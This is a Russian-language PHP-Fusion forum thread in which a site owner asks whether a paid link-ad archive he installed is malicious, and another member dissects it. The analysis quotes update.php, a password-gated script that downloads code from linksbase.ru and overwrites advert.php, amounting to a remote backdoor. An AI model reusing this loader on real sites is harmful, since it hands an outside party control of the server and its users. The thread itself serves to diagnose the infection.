Забыли пароль?
Запросите новый здесь.

Автор темы: Footer
ID темы: 940
Информация:
Тема содержит 11 сообщения, была просмотрена 2694 раз.  Имеются прикрепленные файлы.
Просмотр темы
PHP-Fusion Russia » Поддержка 7 версии » Вопросы новичков
 Распечатать тему
Опасения
Footer
Привет, друзья. Недавно одна дама с адреса yuliahalikova@yandex.ru прислала письмо с предложением размещения у меня на сайте некой информации с переменными ссылками, за кэш естессвенно. Как-то давно уже делал подобное, и подвоха не заподозрил. Разместить надо было в корне сайте содержимое этого архива. Сделал, тётка пропала. Но с сайтом стали твориться чудеса - яндекс на него заругался и исключил из мониторинга. Вдруг пользователь сегодня обнаружился забаненный, чего я не делал. Опасаюсь я. Удалил конечно херь, пароли сменил, но мало ли. Кто сечет в кодах, гляньте, паранойя это или на самом деле болт?
Footer присоединено следующее:файл:
linksbase.rar [2.71кБ / 230 Загрузки]

Все люди на свете разные, только я один такой одинаковый
 
Chief
C виду обычная баннерокрутилка с кэшем. Яндекс чужие линкопомойки не одобряет, поддерживает собственного производителя, поэтому и вылетел из индекса.
У богатых людей — большая библиотека. У бедных людей — большой телевизор.
x1
 
Rush
очень интересно, такого бреда сумасшедшего давно не разбирал)

сам по себе файл advert.php опасности не представляет. с определенной периодичностью он долбится на http://linksbase.ru/links/".$m_host, получает некоторые данные и пишет их в файл db. потом эта фигня разбирается и якобы выводятся ссылки. но это могут быть к примеру и не ссылки, а джабаскрипт, а тут на лицо xss.
но больше всего меня заинтересовал файл update.php, точнее след. код
Загрузить источник  GeSHi: PHP
  1.  
  2. $m_host = $_SERVER['HTTP_HOST'];
  3. $pass = isset($_GET["pass"]) ? $_GET["pass"] : "";
  4. $md5 = "d7af994f1f1ef8b5e3beb9f7fb139f57";
  5.  
  6. if (md5($pass) != $md5)
  7. die ("Password incorrect");
  8.  
  9. $fcont = @GetContent("http://linksbase.ru/scripts/".$m_host) or $fcont = "";
  10.  
  11. if($fcont == "")
  12. die ("File not found");
  13.  
  14. $fname = dirname(__FILE__)."/advert.php";
  15. $fptr = @fopen($fname, "w+");
  16. @fwrite($fptr, $fcont) or die ("File save error");
  17. @fclose($fptr) or die ("File close error");
  18. echo date( "H:i:s, d/m/Y", filemtime($fname) );
Добавлено за 0.036 секунд, используя GeSHi 1.0.8.10

если некое лицо зайдет на update.php?pass=d7af994f1f1ef8b5e3beb9f7fb139f57, то скрипт долбиться уже на http://linksbase.ru/scripts/".$m_host и по сути изменяет код файла advert.php. короче тут целая панацея, при желании с твоим сайтом можно сделать ВСЕ что угодно.
причем все сделано в открытую, уже бы по старинке сделали через обфусцированный js.
Итог:
идея: 3
реализация: 2
аудитория пользователей: лох (без обид конечно, могу продать ускоритель интернета, еще один завалялся, разбирают капец)))
x1
 
Web
Rush
даже удалять не буду, может в блоге когда нибудь напишу про такую шляпу)
 
Web
Polarfox
Если платит нормально можно переписать клиент чтобы не запалила Юльчик, и пусть себе работает. Как только - так исключение, и вместо левака - пустое место.
Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле.
Ежели кто забанен за спам, но не считает себя ботом: можете сообщить мне об этом, все будет хорошо.

PolarLab - вход для подопытных
 
Web
Dysha-Kuzbass
Оффтопик
напишу про такую шляпу)

Rush, такую же, как у тя на аватаре?! ag

(Мэн, не в обиду!) az
Едет вебмастер в поезде и слышит: <td></td> … <td></td> … <td></td>
 
Web
Footer
лох и лох, отрицать не буду. что мне этот код даст, если я в нем секу так же как в нотной грамоте?

вопрос главный: через эту шнягу они все мои пароли узнали? если да, то если я удалил эту папку и сменил пароли, можно не опасаться?
Изменил(а) Footer, 02.10.2012 21:10
Все люди на свете разные, только я один такой одинаковый
 
Rush
пароли от чего? в базе все захешировано. пароли они врядли могут узнать.
 
Web
Footer
от всего. от админки, от закрытых тем форума. не могли узнать при помощи этой бодяги?
Все люди на свете разные, только я один такой одинаковый
 
Rush
интересный вопрос, но скорее всего нет
 
Web
Chief
Rush, разве что "умным" скриптом получили хэш "user_admin_password" и "user_admin_salt" - почесали затылки, и отправили все это в облака на дешифровку al
У богатых людей — большая библиотека. У бедных людей — большой телевизор.
 

Поделиться этой темой
Социальные закладки: Vkontakte Odnoklassniki Mail.ru Facebook Google Tweet This
URL:
BBcode:
HTML:

Перейти на форум:
Топ 5 пользователей форума
Alex Alex (1,171)   Zaxap Zaxap (1,078)   Vova Vova (877)   Pisatel Pisatel (678)   util util (666)